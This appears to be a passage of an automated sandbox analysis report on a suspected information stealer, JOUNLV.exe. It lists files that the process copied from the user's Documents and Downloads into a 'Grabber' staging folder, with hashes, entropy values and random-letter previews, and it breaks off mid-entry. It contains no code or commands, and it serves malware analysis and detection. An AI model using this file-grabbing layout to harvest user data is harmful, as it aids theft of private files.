                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW\NIKHQAIQAU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW\RAYHIWGKDI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW\YPSIACHYXW.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZBEDCJPBEY.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\CURQNKVOIX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JSDNGYCOWY.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JSDNGYCOWY.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
